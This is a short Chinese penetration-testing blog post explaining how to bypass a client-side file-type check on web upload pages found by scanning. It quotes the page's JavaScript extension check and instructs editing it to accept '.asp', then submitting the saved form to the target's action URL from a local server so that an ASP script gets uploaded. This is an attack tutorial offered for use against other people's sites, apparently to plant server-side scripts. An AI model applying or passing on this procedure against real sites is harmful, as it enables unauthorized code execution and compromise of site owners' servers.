本地构造限制上传类型漏洞

一般用于直接扫到的上传页面,名称是:上传图片,上传asp、asa等脚本时提示“请选择jpg或gif文件!”
这时通过这个方法一般都能成功,首先保存到本地1.asp  放到小旋风的目录下,然后找到以下这段代码:
    alert("请点击浏览按钮,选择您要上传的jpg或gif文件!")
    myform.file1.focus;
    return (false);
    }
    else
    {
    str= myform.file1.value;
    strs=str.toLowerCase();
    lens=strs.length;
    extname=strs.substring(lens-4,lens);
    if(extname!=".jpg" && extname!=".gif")
    {
    alert("请选择jpg或gif文件!");
看到这句代码:if(extname!=".jpg" && extname!=".gif")  改为:    if(extname!=".jpg" && extname!=".gif" && extname!=".asp")
然后补充完整上传地址,action=这里,然后网页打开127.0.0.1 直接上传asp文件就可以了。

评论

© 渗透测试 | Powered by LOFTER